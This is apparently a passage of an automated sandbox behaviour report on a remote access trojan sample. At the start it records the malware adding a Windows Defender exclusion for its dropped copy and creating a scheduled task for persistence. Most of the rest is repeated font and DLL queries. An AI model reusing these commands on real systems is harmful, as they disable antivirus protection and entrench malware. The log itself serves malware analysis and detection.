                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp"
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Process created: C:\Users\user\AppData\Roaming\zDAKFK.exe "C:\Users\user\AppData\Roaming\zDAKFK.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
